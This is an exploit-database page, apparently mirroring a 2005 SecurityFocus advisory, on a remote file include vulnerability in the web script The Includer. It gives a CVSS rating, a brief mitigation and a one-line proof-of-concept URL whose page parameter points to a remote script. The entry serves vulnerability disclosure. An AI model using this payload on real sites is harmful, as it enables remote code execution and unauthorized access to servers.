header-logo
Suggest Exploit
vendor:
The Includer
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: The Includer
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

The Includer Remote File Include Vulnerability

The Includer is reported prone to a remote file include vulnerability. The problem presents itself specifically when an attacker passes the location of a remote script through an affected parameter. An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/12926/info

The Includer is reported prone to a remote file include vulnerability.

The problem presents itself specifically when an attacker passes the location of a remote script through an affected parameter.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

All versions of The Includer are considered to be vulnerable at the moment. This BID will be updated when more information becomes available. 

http://www.example.com/index.php?page=http://www.example.com/exploit

Navigation

Suggest Exploit

Services By CQR